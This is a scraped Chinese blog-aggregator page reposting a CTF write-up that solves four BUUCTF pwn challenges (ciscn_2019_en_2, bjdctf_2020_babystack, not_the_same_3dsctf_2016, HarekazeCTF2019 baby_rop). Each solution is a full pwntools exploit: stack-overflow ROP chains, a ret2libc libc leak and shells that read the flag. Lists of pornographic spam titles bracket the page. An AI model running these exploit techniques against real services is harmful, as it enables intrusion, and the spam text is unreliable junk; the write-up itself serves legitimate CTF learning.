日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PWN-PRACTICE-BUUCTF-4

發(fā)布時間:2023/12/10 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PWN-PRACTICE-BUUCTF-4 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

PWN-PRACTICE-BUUCTF-4

    • ciscn_2019_en_2
    • bjdctf_2020_babystack
    • not_the_same_3dsctf_2016
    • [HarekazeCTF2019]baby_rop

ciscn_2019_en_2

這題和ciscn_2019_c_1一模一樣
棧溢出ret2libc,encrypt函數(shù)里的異或運算不用管

from pwn import * context.log_level="debug" io=remote('node4.buuoj.cn',29289) elf=ELF("./ciscn_2019_en_2") libc=ELF("./libc-2.27-18-x64.so") io.recvuntil("Input your choice!\n") io.sendline("1") io.recvuntil("Input your Plaintext to be encrypted\n") pop_rdi_ret=0x0000000000400c83 puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] encrypt=0x00000000004009A0 ret=0x00000000004006b9 payload="a"*(48+32+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(encrypt) io.sendline(payload) io.recvuntil("Ciphertext\n") io.recvuntil("\n") puts_addr=u64(io.recvuntil("\n",drop=True).ljust(8,"\x00")) print(hex(puts_addr)) libc_base=puts_addr-libc.sym["puts"] system=libc_base+libc.sym["system"] binsh=libc_base+libc.search("/bin/sh").next() payload_2="a"*(48+32+8)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system)+p64(encrypt) io.recvuntil("Input your Plaintext to be encrypted\n") io.sendline(payload_2) io.sendline("cat flag") io.interactive()

bjdctf_2020_babystack

輸入要讀取數(shù)據(jù)的長度,然后讀取數(shù)據(jù)到buf
將要讀取數(shù)據(jù)的長度設置為一個較大的值,讀取到buf,構成棧溢出,覆蓋rip到backdoor

from pwn import * io=remote('node4.buuoj.cn',25272) io.recvuntil("\n") io.sendline("50") io.recvuntil("u name?\n") backdoor=0x00000000004006E6 payload="a"*(16+8)+p64(backdoor) io.sendline(payload) io.sendline("cat flag") io.interactive()

not_the_same_3dsctf_2016

main函數(shù)中gets可造成棧溢出,覆蓋eip到get_secret
讀取flag到fl4g,是bss段上某處

題目是靜態(tài)編譯的可執(zhí)行文件,包含了write,exit等函數(shù),利用write函數(shù)將flag打印出來

from pwn import * #context.log_level="debug" io=remote('node4.buuoj.cn',28714) elf=ELF('./not_the_same_3dsctf_2016') get_secret=0x080489A0 write=elf.sym['write'] exit=elf.sym['exit'] flag=0x080ECA2D payload="a"*45+p32(get_secret)+p32(write)+p32(exit)+p32(1)+p32(flag)+p32(45) io.sendline(payload) io.interactive()

[HarekazeCTF2019]baby_rop

簡單的棧溢出,程序包含了字符串"/bin/sh\x00"
先覆蓋rip到一個pop rdi,將"/bin/sh\x00"彈到rdi,再執(zhí)行system,這題的flag在/home/babyrop/flag

from pwn import * #context.log_level="debug" io=remote('node4.buuoj.cn',25416) elf=ELF('./babyrop') io.recvuntil("name? ") pop_rdi_ret=0x0000000000400683 ret=0x0000000000400479 system=elf.plt['system'] main=0x00000000004005D6 binsh=0x0000000000601048 payload="a"*(16+8)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system)+p64(main) io.sendline(payload) io.sendline("cat /home/babyrop/flag") io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-4的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 六月丁香色婷婷 | 青青青青青操 | 成年人网站黄 | 亚洲深夜av| 日韩aⅴ片 | 亚洲av男人的天堂在线观看 | 1024亚洲天堂 | 波多野吉衣中文字幕 | 朱竹清到爽高潮痉挛 | 超碰免费av | 在线精品一区 | www.啪| 黄网站在线观看 | 亚洲网视频 | 国产亚洲激情 | 成人91在线 | 久久理伦| 免费毛片网站在线观看 | 日本黄色片视频 | 黄色美女一级片 | 午夜成人影视 | 欧美成人午夜 | 永久黄色网址 | 五月丁香花 | 男人的天堂伊人 | www.桃色av嫩草.com | 亚洲 欧美 另类 综合 偷拍 | 国产欧美日韩免费 | 日本第一页 | 韩国一区二区在线播放 | 欧洲做受高潮免费看 | 在线色av| 精品一区在线看 | 美女av在线免费观看 | 一级特黄肉体裸片 | 亚洲性在线 | 欧美亚洲色综久久精品国产 | 一本色道av| 91喷水视频 | 欧美第一网站 | av福利站 | 久久综合亚洲色hezyo国产 | 亚洲色图在线播放 | 色网在线| 午夜在线观看视频网站 | 国产乱色精品成人免费视频 | 国产精品系列在线 | 91网页版 | 亚洲第一av网站 | 天天看片天天射 | 国产精品午夜未成人免费观看 | 国产视频一区三区 | 日韩大片免费观看视频播放 | 日韩精品在线一区二区 | 人人干人人爱 | 国产一区亚洲 | 日本人の夫妇交换 | 日韩精品五区 | 法国伦理少妇愉情 | 狠狠鲁视频 | 久久综合色婷婷 | 男人网站在线观看 | 黄色.com| 精品福利视频一区二区 | 情侣av| 免费视频久久久 | 人人干人人草 | 88福利视频 | 国产亚洲电影 | 国产一及毛片 | 裸体的日本在线观看 | 91麻豆精品久久久久蜜臀 | 精品久久久久久亚洲综合网站 | 免费色网址 | 最近2019中文字幕大全第二页 | 亚洲欧洲久久久 | 男人操女人免费网站 | 免费国产91 | 狠狠操一区二区 | 欧美色图网址 | 日韩另类 | 亚洲中文一区二区 | 日韩欧美xxxx| 亚洲欧美在线一区二区 | www国产视频 | 卡通动漫av | 日本黄色大片免费 | www.com国产 | 免费观看国产精品视频 | 亚洲视频二区 | 日本一道本在线 | 欧美黑吊大战白妞 | 久久精品中文字幕 | 97毛片 | 国产精品一区二区三区线羞羞网站 | 神马午夜我不卡 | 无码无遮挡又大又爽又黄的视频 | 熟妇高潮喷沈阳45熟妇高潮喷 | 麻豆成人av |